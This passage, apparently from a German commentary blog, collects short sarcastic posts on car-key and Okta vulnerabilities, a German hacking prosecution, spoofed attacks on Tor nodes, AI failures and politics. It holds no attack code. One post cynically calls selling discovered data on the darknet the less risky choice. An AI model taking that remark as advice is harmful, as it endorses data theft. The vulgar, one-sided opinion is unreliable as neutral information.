Das ist nur ein Thread über ganz stinknormale mechanische Schlüssel, mit den elektronischen will ich gar nicht anfangen. Oder doch? Weil's Spaß macht, und VW hat bei der ersten Entdeckung dieser Gruppe auch völlig „richtig“ reagiert: Sie haben erst mal die Finder der Schwachstelle verklagt, und dadurch die Veröffentlichung um 2 Jahre verzögert. Man sieht daran, dass Richter in solchen Fällen auf der Seite der Autohersteller stehen, und nicht etwa sich Sorgen um ihre Karre machen. Das hat die Sicherheitsexperten immerhin nicht davon abgehalten, praktisch das komplette digitale Schlüsselsystem vieler Hersteller (nicht nur VW) auszuhebeln.
Kein Passiv. Kein "Dinge passieren halt". Einfach ein "wir haben es verkackt und ihr solltet jetzt schnell folgende Dinge tun, um euch zu schützen".
Wo würdet ihr das nächste wieder kaufen? Bei Leuten mit taktischem Passiv oder bei so jemandem?
Update: Jaja, technisch gesehen ist "There has been a massive cock up" auch ein Passiv. Klugscheißer, elende.
Hier die Aussagen der Staatsanwaltschaft, von einem Verfahrensbeobachter berichtet.
Es geht nur um dem SQL Zugriff, nicht um die angebliche Decompilierung. Ihm geht es um die Screenshots.Ooooh, das ist also lebensfremd, dass man auf eine Datenbank zugreift!1!!Zur Nutzung der credentials sagt er "es ist Lebensfremd das man so auf ein Datenbank zugreift"
Da fragt man sich ja schon, was die Staatsanwaltschaft den ganzen Tag macht. Faxe schicken nehme ich an.
Wenn ihr also in Deutschland auf derartig stümperhaft kaputtkonfigurierte Bauruinen von Softwaresystemen stoßt, dann versucht nicht denen zu helfen. Die Anreize, die Politik, Gerichte und Staatsanwaltschaften setzen, sind mehr als eindeutig. Es ist weniger riskant und profitabler, die Daten direkt im Darknet zu verkloppen. Der Standort Deutschland ist eh nicht mehr zu retten.
Was der Richter wohl sagen würde, wenn er merkt, dass sein Autoschlüssel auch in alle anderen Autos derselben Baureihe passt? Fände er dann auch, dass die Autohersteller schon alles in ihrer Macht liegende gemacht haben?
Unglaublich.
Im Kern geht es der Kammer darum ob ein Jedermann auf die Daten (SQL Datenbank) zugreifen kann. Das verneint in diesem Fall die Kammer.Herzlichen Glückwunsch. Jedes Land hat die Regierung und die Richter, die es verdient hat.
Auf dem Screenshot der .exe Datei (in notepad) können sie als Laien nix entnehmen, sie haben es versucht und nix verstanden.Es ist offensichtlich das Modern Solutions versucht hat (sic!) die Daten zu schützen. Die Schutzmaßnahmen waren für Experten wohl ein Witz, aber das ist irrelevant. Es gab den willen und einen Versuch, das ist durch das Kennwort evident.
The Okta Device Access features, provided by the Okta Verify agent for Windows, provides access to the OktaDeviceAccessPipe, which enables attackers in a compromised device to retrieve passwords associated with Desktop MFA passwordless logins.
Ich bin ja immer wieder fasziniert, mit wie vielen völlig unvertrauenswürdigen "Agenten" sich typische Enterprise-Installationen die Geräte vollmüllen. Jeder davon ist zusätzliche Angriffsoberfläche!
Kommentar: Es ist keine Schande, gehackt zu werdenIch beneide so Leute ja immer um ihr Selbstbewusstsein. Wenn ich etwas probiere und nicht schaffe, dann nehme ich an, ich mache etwas falsch und muss meine Herangehensweise ändern.
Nicht so die Denkschule, die wir hier beobachten können! Da sieht man Scheitern eher als Zeichen, dass das dann halt unmöglich ist und niemand das kann. Denn wenn das ginge, dann hätte ich es ja geschafft. Und zwar beim ersten Versuch!
So, und weil ihr alle per Definition dümmer als ich seid, solltet ihr euch nicht grämen, wenn ihr es auch nicht schafft!
Richtig deprimierend wird es, wenn ihr darüber nachdenkt, was für weitere Implikationen diese Einstellung hat. Wenn aus "ich kann es im Moment nicht" direkt "es geht nicht" folgt, dann ist auch Fortbildung Zeitverschwendung. Dinge dazu lernen? Überflüssig! Besser als was ich jetzt mache geht eh nicht!
Und ehe du es dich versiehst ist die Selbstzerstörung selbstverstärkend.
Ergebnis: Die Hilfskräfte erschienen nicht zur Übung.
Laut der Deutschen Presse-Agentur (DPA) habe es Schwierigkeiten gegeben, freiwillig organisierte Dienste ausreichend zu mobilisieren, sagten Behördenvertreter, die den vorher geheim gehaltenen Ablauf beobachteten.Der Himmel stehe uns bei, falls wir mal wirklich ein Problem haben.
Nach Beobachtungen von rbb-Reportern lagen die angeforderten 75 Statisten bereits als vermeintliche Opfer auf dem Boden. Wer aber nicht zur Übung kam, waren die Rettungskräfte der Hilfsorganisationen - also wurde die Übung nach mehreren Stunden abgebrochen. Die Komparsen wurden kurz nach 13 Uhr nach Hause geschickt.Die armen Komparsen. Liegen da rum und spielen Leiche und keiner kommt. m(
Berlin bleibt stabil! Ein Wunder, dass so wenig passiert.
Siemens Mobility, das den Triebwagen namens „Desiro“ vor sechs Jahren in Betrieb genommen hat, hält sich ebenfalls zurück: „Die Züge der RRX-Flotte sind momentan mit Einschränkungen im Betrieb, da bei einigen Zügen im Kommunikationssystem zwischen Fahrgästen und Zugführung ein Fehler aufgetreten ist. Wir arbeiten intensiv daran, diesen zu beheben und entschuldigen uns für die entstandenen Unannehmlichkeiten.“Ah, der taktische Passiv in Presseverlautbarungen. Da ist ein Fehler aufgetreten. Nicht: Siemens hat in einem geradezu epischen Monsterverkacker ein kaputtes Update ungetestet bei seinen Kunden aufgespielt und die haben jetzt Ausfälle und Verkehrschaos. Nein. Ein Fehler ist aufgetreten. Kann man nichts machen.
Ärgert mich ja maßlos, sowas. (Danke, Thilo-Alexander)
Das war ein ziemlich neuer Zug der NEB, der Niederbarnimer Eisenbahngesellschaft.
Tja, und jetzt? Serienfehler oder Brandstiftung?
Ich kann mir nicht vorstellen, dass jemand Hass gegen die NEB hat. Die betreiben die sehr populäre Heidekrautbahn und deren Personal ist mir noch nie anders als freundlich, zuvorkommend und professionell aufgefallen. Die Züge sind auch modern und sauber.
Die Züge sind AFAIK von Siemens. Na mal gucken, wie es weitergeht.
Update: Leute, die sich besser mit sowas auskennen, sagen, dass es sich um einen Zug von Bombardier handelt. Ich kam auf Siemens, weil die auf ihrer Webseite Werbung für einen Siemens-Wasserstoff-Probezug hatten.
Update: Das war nicht der ersten Brand in diesem Zugtyp, nicht mal bei der NEB.
Update: Der Zug war 20 Jahre alt. Mehrere Leser finden, das falle nicht unter "ziemlich neu". Ist vermutlich eine Frage der Perspektive. Ich dachte der Zug ist neuer.
Vorschläge in dem jüngsten Grundsatzpapier von FDP-Chef Christian Lindner seien zum Teil wörtlich aus Anträgen übernommen, die die Unionsfraktion in den vergangenen zwei Jahren in den Bundestag eingebracht habe, schreibt der CDU-Kanzlerkandidat in seinem E-Mail-Newsletter "MerzMail".Ah, der Lindner. Der beste Mann! ... der CDU.
Das Problem für die FDP ist halt, dass die CDU ja nicht blöde ist. Wenn der Lindner in der Ampel seine Koalition dermaßen krass verrät und in den Rücken dolcht, dann muss man davon ausgehen, dass er dasselbe mit der CDU auch machen wird.
Wie heißt es so schön? Alle lieben den Verrat, niemand liebt den Verräter.
Es scheint, als würde O2 seinen Präfix nicht von einer FE80::/8 Adresse verschicken, sondern von einer Adresse, die den Anschein macht als würde sie gerne eine FE80::/8 Adresse sein:Einmal mit Profis arbeiten! (Danke, Maximilian)Adresse von der ich die DHCPv6 Antwort bekomme: 0:80fe::f6e4:51ff:fed3:bc71
Adresse von der ich die DHCPv6 Antwort erwartete: fe80::f6e4:51ff:fed3:bc71
Einziges Problem: Es gab keine Parade. Die hat sich eine "KI" aus dem Arsch gezogen.
The parade was announced by My Spirit Halloween and attracted thousands of Dublin locals to gather along a route from Parnell Square to Temple Bar for an event supposedly organised by Galway arts ensemble Macnas. It was only after the Halloween fans arrived that it became clear that the website had made the entire parade up.
Schon tolle Technologie, dieses "KI". Da willst du doch deine berufliche Zukunft drauf wetten!1!!
Zero-Click Flaw Exposes Potentially Millions of Popular Storage Devices to Attack
Weia.
Weil sie das Geld schon für Blockchain-Förderung aus dem Fenster geworfen haben. Und jetzt neu: "KI". Klar.
Kein Trend ist zu blöde, als dass er nicht mit Steuergeld beworfen wird.
Alleine für den Hostnamen "trust.okta.com" für ihre Security Advisories müsste eigentlich ein Regulator diese Firma zerschlagen. Aber ignoriert das mal kurz. Lest mal das Advisory. Das ist so bizarr, dass mir gerade echt die Worte fehlen. Ich zitiere mal:
Okta AD/LDAP Delegated Authentication - Username Above 52 Characters Security AdvisoryNein, wirklich!
On October 30, 2024, a vulnerability was internally identified in generating the cache key for AD/LDAP DelAuth. The Bcrypt algorithm was used to generate the cache key where we hash a combined string of userId + username + password. During specific conditions, this could allow users to authenticate by only providing the username with the stored cache key of a previous successful authentication.Note: A precondition for this vulnerability is that the username must be or exceed 52 characters any time a cache key is generated for the user.
Das klingt jetzt gerade nicht wie ein Buffer Overflow, eher das Gegenteil. Die kleben drei Strings hintereinander, der dritte ist das Passwort. Aber bcrypt hat ein Limit von 56 Bytes. Am Anfang ist die User-ID, die packen sie offenbar als 32-bit-Integer in das bcrypt rein. Bleiben besagte 52 Zeichen, wenn man noch nie von UTF-8 gehört hat. Fucking Amis ey.Einmal mit Profis arbeiten!
Update: Die sind übrigens nicht völlig unfähig bei Okta. Die Krisenkommunikations-Abteilung ist top notch. Die haben wie beim letzten Mal schön alles zurückgehalten bis Freitag nach Dienstschluss. Schön den Schaden maximieren, und hoffen, dass das am Wochenende verdampft, bis die Leute am Montag andere Dinge zu tun haben.
Na DAS fiel denen ja früh auf!1!! Nächstes mal vielleicht, hear me out, vorher warnen?
Das war IDC, nicht die CIA. Aber grämt euch nicht. IDC hat schon eine Idee, wohin die eingesparte Kohle gehen sollte.
Becoming an AI-fueled businessIch amüsiere mich ja über die Schamlosigkeit hinter dem AI Use Case Discovery Tool. Wenn der Nutzen so unklar ist, dass du ein Tool brauchst, um überhaupt nutzbringende Szenarien zu entdecken, dann solltest du das am besten gar nicht machen. Ich verrate hier mal ein Geheimnis: Die Szenarien sind vor allem für die Verkäufer nutzbringend.AI Use Case Discovery Tool
Tuning Your Cybersecurity with AI
Die ESA hat eine Visualisierung in Form von Satellitenfotos vorher-nachher von Valencia. *grusel*
The cost of cleaning up Sellafield is expected to spiral to £136bn and Europe’s biggest nuclear waste dump cannot show how it offers taxpayers value for money, the public spending watchdog has said.
Achtung: billion. 136 billion. Pfund. Nicht Millionen. Milliarden.Money Quote:
Europe’s most hazardous industrial site has previously been described by a former UK secretary of state as a “bottomless pit of hell, money and despair”.
Oh und sie hatten letztens auch ein Cyber-Cyber-Problem. Klar. Der Teufel scheißt gerne auf den größten Haufen.
Gibt es, aus den Niederlanden. Lief ungefähr so, wie ihr wahrscheinlich angenommen habt.
Am Kopf kratzen bringt 380 Euro Strafe: KI versagt als StraßenpolizistDie "KI" hat da ein Handy hinhalluziniert. Natürlich sind die Niederländer vorsichtig und tun genau das, was alle AI Bros immer sagen: Ein Mensch kontrolliert das nach.
Und dann passierte, was immer passiert, wenn ein Computer etwas tut und der Mensch das kontrollieren soll. Der Mensch denkt sich: Der Computer wird schon wissen, was er tut. Ich mach mal Wochenende.
Die größte Lüge bei der "KI" ist nicht, dass die "KI" schon funktionieren wird, sondern die Entscheidung am Ende bei Menschen liegen wird, die das nachkontrollieren. NIEMAND kontrolliert irgendwas nach! Könnt ihr ja ganz leicht an euch selbst testen. Wie oft guckt ihr in euren Spamordner?
Update: Ach gucke mal, der immer wieder großartige Cory Doctorow hat auch gerade was zu der Frage der menschlichen Überwachung von "KI" geschrieben. Der Mann kan ja echt mit Worten umgehen, spricht hier von einer "moralischen Knautschzone". Gänsehaut!
Biden sagte dem von den offiziellen Stenografen des Weißen Hauses vorbereiteten Transkript zufolge im Gespräch mit einer Latino-Gruppe am Dienstagabend: "Der einzige Müll, den ich da draußen treiben sehe, sind seine Anhänger." Und: "Seine Dämonisierung von Latinos ist skrupellos und unamerikanisch." Das vom Pressebüro des Weißen Hauses veröffentlichte Transkript indes wurde um einen Apostroph ergänzt, das die Bedeutung des Satzes im Englischen entscheidend ändert. Statt "supporters" (Unterstützer/Anhänger) steht dort "supporter's". Damit würde die Übersetzung des Satzes lauten: "Der einzige Müll, den ich da draußen treiben sehe, ist der seiner Anhänger."Wenn wir schon am Nitpicken sind: Das müsste supporters' heißen, außer Trump hat nur einen Supporter. Das wäre natürlich auch witzig, wenn das ein Seitenhieb auf Elon Musk mit seinem ganzen Weltraumschrott gewesen wäre, der jetzt die Astronomen behindert.
Von diesem 1. November an können volljährige Personen (ab 18 Jahren) nach dem neuen deutschen Selbstbestimmungsgesetz ihren Namen und ihr Geschlecht in amtlichen Unterlagen ändern oder die Geschlechtsmarkierung ganz streichen lassen. Auch der Vorname kann problemlos der Geschlechtsidentität entsprechend angepasst werden. Zwischen der Antragstellung und der Abgabe der persönlichen Erklärung müssen drei Monate vergehen. Die bislang vorgeschriebenen psychiatrischen Gutachten und gerichtlichen Anhörungen entfallen.
The European Commission has published today the 2024 Climate Action Progress Report, showing that net EU greenhouse gas (GHG) emissions fell by 8.3% in 2023 compared to the previous year. This is the largest annual drop in decades, with the exception of 2020 when COVID-19 led to emission cuts of 9.8%. Net GHG emissions are now 37% below 1990 levels, while GDP grew by 68% over the same period, showing the continued decoupling of emissions and economic growth. The EU remains on track to reach its commitment to reduce emissions by at least 55% by 2030.
Vor allem der Kohleausstieg hat das bewirkt. Sie halten ihren Emissionshandel auch für ein Erfolgsmodell, weil die Industrie, die am meisten betroffen war, auch am meisten Emissionen eingespart hat.Ich bin mal gespannt, wo da der Pferdefuß ist. Eine Warnlampe ist, dass sie mal mit 1990 vergleich, mal mit 2005 und mal mit 2022. Das schmeckt ein bisschen nach Cherry Picking.
Update: Ein Leser kommentiert:
der von Dir vermutete Pferdefuß bei der GHG-Wachstums-Rechnung hängt hier:
Es wurden sämtliche Euros des Wirtschaftswachstums von 1990 bis 2022 addiert, aber nicht sämtliches dafür produziertes CO2. Da wurden nur einzelne Werte verglichen.
Money Quote:
Radargeräte der neuesten Generation könnten mithilfe künstlicher Intelligenz in die Lage versetzt werden, automatisiert auch weitere Verstöße zu erfassen, zitierte der Sender France Info aus den Regierungsplänen.Mit "KI" wird alles besser!!1!
Schickt ihr da immer schön einen Abuse-Report an den ISP?
Dann seid ihr möglicherweise Teil eines konzertierten Angriffs gegen das Tor-Netzwerk. Stellt sich raus: Da laufen lauter SYN-Pakete zu Port 22 durchs Internet, mit gespoofter Absenderadresse von Tor-Nodes (nicht nur Exit Nodes!).
Ergebnis: Ein ständiger Strom aus Abuse-Reports bei den Hostern, und mehrere Nodes sind auch schon abgeschaltet worden deswegen. Auf der Tor-Mailingliste gibt es auch Sichtungen des Phänomens. (Danke, Knuth)
Nun, dafür gibt es eine einfache Erklärung:
„Dabei sind die Zahlen wahrscheinlich gar nicht drastisch gestiegen“, ist der Leiter des ZEW-Forschungsbereichs „Arbeitsmärkte und Sozialversicherungen“, Nicolas Ziebarth, überzeugt. Vielmehr seien sie Folge eines „statistischen Erfassungseffektes“.Ach. Ach was? Wie kann denn das sein?!
„Seitdem die Arbeitsunfähigkeitsbescheinigungen (AU) seit 2022 elektronisch erfasst werden, werden auch die Krankenstände viel besser und genauer erfasst“, sagte Ziebarth dieser Redaktion. Zuvor landeten viele gelbe Zettel, die erkrankte Arbeitnehmer von ihren Ärzten erhalten haben, erst gar nicht beim Arbeitgeber, sodass diese dann auch nicht registriert wurden.Da fällt es einem doch wie Schuppen aus den Haaren!1!!
Update: Ein Leser korrigiert:
da ist dem Redakteur ein Fehler unterlaufen. Der Arbeitgeber hat den Zettel meist bekommen, für den hat der Mitarbeiter den ja geholt. Die Kopie für die Krankenkasse, bei der die Statistik gemacht wird, blieb gerne mal liegen.
(Danke, Frank)